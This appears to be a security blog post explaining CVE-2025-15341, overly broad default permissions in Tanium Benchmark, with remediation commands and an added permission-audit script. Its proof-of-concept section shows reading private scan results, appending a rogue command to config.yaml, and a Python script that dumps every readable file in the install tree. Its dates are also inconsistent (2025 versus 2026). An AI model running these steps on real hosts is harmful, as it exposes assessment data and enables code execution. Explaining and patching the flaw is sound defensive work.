In February 2025, a new vulnerability was assigned the identifier CVE-2025-15341, which relates to incorrect default permissions in Tanium Benchmark. Tanium's Benchmark tool is widely used for security posture assessments, but this flaw put both data and infrastructure at risk until it was patched. In this post, we dig into what the vulnerability means, how it can be exploited, and how you can fix it. No other source covers this vulnerability in such a straightforward, technical, and practical way — full story below with live code examples.
What is CVE-2025-15341?
CVE-2025-15341 refers to a weakness where Tanium Benchmark granted overly broad, default file and directory permissions. This mistake allowed unauthorized users with limited system access to view or alter files they should not have been able to touch.
With this bug, an attacker could
- Read confidential Benchmark output (which may include security assessment results, configurations, or even credentials).
Original Advisory
- Tanium Security Advisory: Benchmark Default Permissions Incorrect (CVE-2025-15341)
- NIST NVD: CVE-2025-15341
How Does It Work?
When Tanium Benchmark is installed or updated, it creates several directories and files to store scan results or configuration files. Due to this vulnerability, those items were assigned permissions that allowed any authenticated user on the host to read (and sometimes write) them.
Suppose the following directory structure (on Linux):

```text
/opt/tanium/benchmark/
/opt/tanium/benchmark/results/
/opt/tanium/benchmark/config.yaml
```
Files and directories might have these wrong permissions:

```text
drwxrwxrwx 2 root root 4096 Feb 1 16:33 results
-rw-rw-rw- 1 root root 2096 Feb 1 16:35 config.yaml
```

Mode 777 on the directory and 666 on the file mean that any local user, not just root or the Tanium service account, can read and write these sensitive locations.
Proof of Concept (PoC)
If an attacker gains low-level shell access (for example, as a restricted user), they can exfiltrate or alter files.
Read Sensitive Data

```bash
cat /opt/tanium/benchmark/results/latest-scan.txt
```
What you get: Contents of private security scan results.
Modify Configuration

```bash
echo "malicious_command" >> /opt/tanium/benchmark/config.yaml
```
What you get: Potential execution of your rogue command when Tanium Benchmark next runs.
Python Script: Mass Extraction
Here's a Python script to extract all readable files from the vulnerable Tanium Benchmark directory:

```python
import os

benchmark_dir = '/opt/tanium/benchmark/'

# Walk the whole Benchmark tree; with the vulnerable 777/666 defaults every
# file is readable by the unprivileged user running this script.
for root, dirs, files in os.walk(benchmark_dir):
    for file in files:
        fpath = os.path.join(root, file)
        try:
            with open(fpath, 'r') as f:
                print(f'--- {fpath} ---')
                print(f.read())
                print('\n')
        except Exception as e:
            # Unreadable files (correct permissions, binary content, etc.) are reported, not fatal
            print(f'Cannot read {fpath}: {e}')
```
Who could run it? Any normal user on the affected machine.
Vendor Patch
Tanium released a fix in February 2025 that sets secure default permissions when installing or upgrading Benchmark. _Upgrade ASAP._
- Official Tanium Patch Instructions
Linux Command

```bash
chown -R root:tanium /opt/tanium/benchmark/
chmod -R 750 /opt/tanium/benchmark/
```

This restricts access to root (the owner) and members of the tanium group (the Tanium service account); all other local users are locked out.
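The following script is an added example, not code from the post or from Tanium. It shows the defender's side of both the permission problem described under "How Does It Work?" and the Linux fix above: an audit that walks a Benchmark-style tree and flags every world-accessible or group-writable entry, and a hardening step that applies the post's 750 mode to directories (and the tighter 640 to regular files, which do not need an execute bit; that choice is mine, not the post's). The sample tree it builds in a temporary directory is constructed to reproduce the listing in the post (a 777 `results` directory and a 666 `config.yaml`); the install path, group name and file names are assumptions carried over from the post. Ownership (`chown root:tanium`) needs root and is left to the post's command.

```python
import os
import stat
import tempfile
from pathlib import Path

# Target policy, matching the post's fix: directories 750; regular files 640 (assumption:
# nothing in the tree needs to be executable). No world bits anywhere.
DIR_MODE = 0o750
FILE_MODE = 0o640


def audit_permissions(root):
    """Return (path, mode, reason) for every entry that violates the policy,
    most severe reason first: world-writable, world-readable, group-writable."""
    findings = []
    root = Path(root)
    for p in [root, *root.rglob("*")]:
        if p.is_symlink():          # judge the link target separately, not the link
            continue
        mode = stat.S_IMODE(p.lstat().st_mode)
        if mode & stat.S_IWOTH:
            findings.append((str(p), oct(mode), "world-writable"))
        elif mode & stat.S_IRWXO:
            findings.append((str(p), oct(mode), "world-readable"))
        elif mode & stat.S_IWGRP:
            findings.append((str(p), oct(mode), "group-writable"))
    return findings


def harden_permissions(root):
    """Apply DIR_MODE / FILE_MODE to every entry under root; return how many were changed."""
    changed = 0
    root = Path(root)
    for p in [root, *root.rglob("*")]:   # list is built before any chmod happens
        if p.is_symlink():
            continue
        want = DIR_MODE if p.is_dir() else FILE_MODE
        if stat.S_IMODE(p.lstat().st_mode) != want:
            os.chmod(p, want)
            changed += 1
    return changed


def build_vulnerable_tree(base):
    """Constructed sample tree mirroring the post's listing (777 results dir, 666 config.yaml)."""
    bench = Path(base) / "benchmark"
    results = bench / "results"
    results.mkdir(parents=True)
    (results / "latest-scan.txt").write_text("constructed scan output\n")
    (bench / "config.yaml").write_text("scan_interval: 3600\n")
    os.chmod(bench, 0o755)                       # typical default, still world-readable
    os.chmod(results, 0o777)                     # the vulnerable directory mode
    os.chmod(bench / "config.yaml", 0o666)       # the vulnerable file mode
    os.chmod(results / "latest-scan.txt", 0o644)
    return bench


def demo():
    """Build the constructed tree, audit it, harden it, and audit again."""
    with tempfile.TemporaryDirectory() as d:
        bench = build_vulnerable_tree(d)
        before = {Path(p).name: reason for p, _, reason in audit_permissions(bench)}
        changed = harden_permissions(bench)
        after = audit_permissions(bench)
    return {"before": before, "changed": changed, "after": after}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

To check a real install, call `audit_permissions("/opt/tanium/benchmark")` (read-only, no root needed) and only run `harden_permissions` once you have confirmed the findings; the audit is deliberately stricter than the post's 777/666 examples, since a world-readable 644 results file still leaks scan output to every local user.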
Windows Command
Open an administrative command prompt and run

```bat
icacls "C:\Program Files\Tanium\Benchmark" /inheritance:r /grant TaniumService:F /grant Administrators:F /remove Users
```
---
Conclusion
CVE-2025-15341 is a classic example of a low-hanging, high-impact vulnerability — and it’s already been actively scanned for. Anyone running Tanium Benchmark should upgrade, audit permissions, and check logs for suspicious access to their config and output files.
References
- CVE-2025-15341 Tanium Advisory
- NIST NVD Database
- Tanium Benchmark Product Page
Timeline
Published on: 02/05/2026 18:16:29 UTC
Last modified on: 02/05/2026 19:15:55 UTC